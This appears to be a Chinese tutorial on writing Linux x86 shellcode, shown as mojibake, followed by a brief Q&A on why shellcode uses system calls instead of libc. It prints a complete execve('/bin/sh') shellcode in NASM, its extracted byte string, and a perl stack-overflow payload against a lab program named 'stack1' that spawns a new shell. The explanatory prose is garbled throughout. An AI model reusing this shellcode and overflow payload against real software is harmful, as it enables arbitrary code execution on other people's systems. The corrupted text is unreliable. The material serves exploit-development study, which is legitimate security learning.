Ⅰ 濡備綍緙栧啓shellcode 鍗氬
銆銆shellcode閫氬父鏄鐢變簬strcpy/sprintf絳夊瓧絎︿覆鍑芥暟閫犳垚婧㈠嚭錛屽洜姝ら氳繃鏉ユ敞鍏ョ殑shellcode涓嶈兘鍑虹幇闆跺瓧鑺傘備絾瀹為檯榪愯岀殑浠g爜鏄闇瑕0鐨勶紝閭e備綍澶勭悊鍛錛
銆銆浣跨敤xor鎸囦護瀵瑰瘎瀛樺櫒榪涜屾竻闆舵垨鑰卌ld錛屽傦細
銆銆xor eax, eax
銆銆xor ebx, ebx
銆銆xor ecx, ecx
銆銆cld ; 璇ユ寚浠ゅ筫dx榪涜屾竻闆
銆銆濡傛灉闇瑕佸皢eax鐨勫艱祴涓0x5錛屼笉鑳界洿鎺ュ啓鎴恗ov eax, 0x05錛屽洜涓哄畠浼氱敓鎴愭満鍣ㄧ爜mov eax, 0x00000005錛屼細鏈0濉鍏呫傚彲浠ラ噰鐢ㄤ笅闈㈣繖涓鎶宸э細
銆銆xor eax, eax
銆銆mov al, 0x05
銆銆X86鏋朵笂瀵歸氱敤瀵勫瓨鍣ㄩ兘鎻愪緵瀵瑰簲鐨16浣嶅拰8瀵勫瓨錛屼笂榪頒緥瀛愬氨鏄閫氳繃瀹冩潵閬垮厤闆跺嚭鐜般
銆銆濡備綍鐭ラ亾緇濆瑰湴鍧
銆銆灝界″湪鍓嶉潰鐨勬敾鍑諱緥瀛愪腑錛宻hellcode瀛樻斁鐨勫湴鍧鏄宸茬煡閬撶殑錛屼絾涓嶅悓鐨勬敾鍑諱腑錛屽畠鐨勫湴鍧鏄浼氬彉鍖栫殑錛岄偅涔堟垜浠濡備綍緙栧啓shellcode涓嶄緷璧栦簡榪欎釜鍙樺寲鐨勫湴鍧鑰岄氱敤鍖栧憿錛 閭d箞闇瑕佸熺敤涓浜涚浉瀵硅煩杞鎸囦護鏉ヨ幏鍙栫粷瀵瑰湴鍧
銆銆call鎸囦護鏄鐩稿硅漿璺籌紝浣嗕細鍦ㄦ爤涓婂帇涓婄粷瀵瑰湴鍧錛岀劧鍚庡啀寮瑰嚭灝卞彲浠ヨ幏鍙栫粷瀵瑰湴鍧錛屽傦細
銆銆jmp short get_string
銆銆code:
銆銆pop eax ; 榪欓噷寮瑰嚭鐨勬槸call鎸囦護鍘嬫爤鐨勪笅鏉℃寚浠ょ殑鍦板潃錛屽嵆"hello world"瀛楃︿覆鐨勫湴鍧
銆銆get_string:
銆銆call code
銆銆data:
銆銆db 'hello world', 0x0a
銆銆push鎸囦護灝嗘暟鎹鍘嬪埌鏍堜笂錛岀劧鍚庤幏鍙杄sp鐨勫礆紝灝辨槸鍒氬帇鏍堟暟鎹鐨勭粷瀵瑰湴鍧錛屽傦細
銆銆push 0x4b435546 ; 0x46, 0x55, 0x43, 0x4b 鍒嗗埆 FUCK瀛楃︾殑 ascii鐮
銆銆mov eax, esp ; 灝"FUCK"瀛楃︿覆棣栧湴鍧璧嬬粰eax錛屽悗緇鍙鐢ㄤ簬緋葷粺璋冪敤浼犲弬
銆銆linux緋葷粺璋冪敤綰﹀畾
銆銆Linux緋葷粺璋冪敤鏄浠int 0x80鎸囦護鏉ラ櫡鍏ュ唴鏍告佺殑錛岀郴緇熻皟鐢ㄥ彿閫氳繃eax鏉ヤ紶閫掞紝鍙傛暟鍒嗗埆鏄痚bx, ecx, edx, edi, esi鏉ヤ紶閫掋
銆銆緙栧啓shellcode
銆銆鍦↙inux涓嬬紪鍐檚hellcode錛屽彲浠ョ洿鎺ヤ嬌鐢╣cc瀵規眹緙.S鏂囦歡榪涜岀紪璇戦摼鎺ワ紝鐢熸垚鏍囧噯鐨勫彲鎵ц孍LF鏂囦歡錛屽悓鏃朵篃鑳界洿鎺ヨ繘琛屾祴璇曪紝浣嗘湁涓鐐逛笉鏂逛究鏄鐨勬彁鍙栨満鍣ㄧ爜寰堜笉鏂逛究銆
銆銆涓轟簡鏂逛究鐢ㄦ彁鍙栨満鍣ㄧ爜錛屼嬌鐢╪asm緙栬瘧鍣ㄧ敓鎴恇in鏍兼枃浠訛紝娌℃湁浠諱綍鍏跺畠鏍煎紡鏁版嵁錛屾柟渚跨洿鎺ユ彁鍙栥
銆銆鎴戜滑瑕佺紪鍐欑殑鏈鍦皊hellcode錛屽瑰簲C 璇璦閫昏緫濡備笅
銆銆char *argv[2];
銆銆argv[0] = "/bin/sh";
銆銆argv[1] = NULL;
銆銆execve("/bin/sh", argv, NULL);
銆銆緲昏瘧鎴愭眹緙栬璦榪囩▼濡備笅錛
銆銆灝"/bin/sh"瀛楃︿覆鍘嬪埌鏍堜笂錛屽寘鍚瀛楃︿覆緇撲覆絎'\0'
銆銆xor edx, edx
銆銆push edx
銆銆push 0x68732f2f
銆銆push 0x6e69622f
銆銆灝嗗瓧絎︿覆/bin//sh鍘嬪叆鏍堝唴錛屽悓鏃墮氳繃push edx鏉ヤ繚璇佸瓧絎︿覆鍚庨潰鐨勬暟鎵鎹鏄0錛屼篃鍗沖瓧絎︿覆緇撴潫絎︺ 璇鋒敞鎰忥紝鏍堟槸浠庨珮鍦板潃鍚戜綆鍦板潃鐢熼暱鐨勶紝鎵浠ヨ佷粠瀛楃︿覆灝懼反鍘嬭搗銆
銆銆mov ebx, esp
銆銆姝ゆ椂鏍堝簳灝辨槸瀛楃︿腑鍧鐨勫紑濮嬪湴鍧錛岃ユ寚浠ゅ皢瀛楃︿覆鍦板潃璧嬬粰ebx(緋葷粺璋冪敤鐨勭涓涓鍙傛暟錛
銆銆灝嗕笅鏉ユ槸灝哸rgv[2]鏁扮粍鐨勫唴瀹規斁鍒版爤涓娿
銆銆push edx ; 灝哸rgv[1](鍊間負 NULL) 鏀懼埌鏍堜笂
銆銆push ebx ; 灝哸rgv[0]( "/bin//sh")鏀懼埌鏍堜笂
銆銆姝ゆ椂esp鎸囧悜鐨勭┖闂達紝鍒氭墠瀵瑰簲argv[2]鏁扮粍緇撴瀯鐨勫紑濮嬪湴鍧
銆銆鐢變簬argv鏄緋葷粺璋冪敤絎浜屽弬鏁幫紝闇瑕佸皢瀹冭祴緇檈cx
銆銆mov ecx, esp
銆銆xor eax, eax,
銆銆mov al, 0xb
銆銆鍒拌繖鏃, eax 涓 11錛堢郴緇熻皟鐢ㄥ彿錛夛紝ebx涓"/bin//sh"瀛楃﹀彿錛堢涓鍙傛暟錛夛紝ecx涓篴rgv鏁扮粍錛堢浜屽弬鏁幫級錛宔dx涓篘ULL錛堢涓夊弬鏁幫級錛岄偅灝卞彲浠ョ洿鎺ヤ嬌鐢╥nt 0x80榪涜岀郴緇熻皟鐢ㄤ簡銆
銆銆int 0x80
銆銆灝嗕笂榪版寚浠ゆ嫾鍦ㄤ竴璧峰氨鏄濡備笅鐨勬眹緙栦唬鐮侊細
銆銆[plain] view plainprint?鍦–ODE涓婃煡鐪嬩唬鐮佺墖媧劇敓鍒版垜鐨勪唬鐮佺墖
銆銆BITS 32
銆銆
銆銆xor edx, edx
銆銆push edx
銆銆push 0x68732f2f
銆銆push 0x6e69622f
銆銆
銆銆mov ebx, esp
銆銆
銆銆push edx
銆銆push ebx
銆銆
銆銆mov ecx, esp
銆銆
銆銆xor eax, eax
銆銆mov al, 0xb
銆銆
銆銆int 0x80
銆銆緙栬瘧鐢熸垚鏈哄櫒鐮
銆銆nasm -o shell2 shell2.s
銆銆鐢熸垚鐨剆hell2鏂囦歡涓篵in鏁版嵁錛屽叏鏄鏈哄櫒鐮侊紝娌℃湁浠諱綍鏍煎紡鏁版嵁錛屼嬌鐢↙inux鍛戒護杞鎹㈡垚bash鎴栬卲erl鍙杈撳叆鐨剆hellcode.
銆銆$ od -t x1 shell2 | sed -e 's/[0-7]*//' | sed -e 's/ /\\x/g'
銆銆\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
銆銆\x53\x89\xe1\x31\xc0\xb0\x0b\xcd
銆銆鐒跺悗浣跨敤涔嬪墠鐨剆tack1紼嬪簭榪涜屾祴璇曪細
銆銆$ echo $$
銆銆2503
銆銆$ perl -e 'printf "A"x48 . "\x10\xd7\xff\xff" . "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"' > bad.txt;./stack1
銆銆data: ▒▒▒1▒Rh//shh/bin▒▒RS▒▒1▒
銆銆̀▒▒▒
銆銆$ echo $$
銆銆4398
銆銆璇存槑錛歟cho $$鍛戒護杈撳嚭褰撳墠shell錛堝嵆bash鎴栬卻h)鐨刾id
銆銆鍓嶅悗涓ゆ′笉涓鏍鳳紝閭e氨璇存槑 shellcode鎵ц屽悗錛屾墦寮浜嗕竴涓鏂皊hell銆 涔熷嵆shellcode榪愯屾垚鍔燂紝嫻嬭瘯閫氳繃銆
Ⅱ linux鐜澧冧笅鐨剆hellcode涓轟粈涔堜笉璋冪敤libc涓鐨 搴撳嚱鏁幫紝鑰屾槸鍒╃敤緋葷粺璋冪敤
鎬庝箞鍒╃敤libc錛焥hellcode闇瑕佸湪瀵規柟鏈哄櫒涓婅繍琛屻傝屾ゆ椂shellcode騫朵笉鏄涓涓瀹屾暣鐨勫簲鐢ㄧ▼搴忥紝瀹冨彧鏄甯︽湁婕忔礊鏀誨嚮鎸囦護鐨勬暟鎹銆傝皟鐢╨ibc寰楀規柟鏈哄櫒涓婄殑鍔ㄦ侀摼鎺ュ姞杞藉櫒緇欎綘鍋氶摼鎺ャ傛妧鏈闂棰樻瘮鐩存帴緋葷粺璋冪敤榪樺嶆潅銆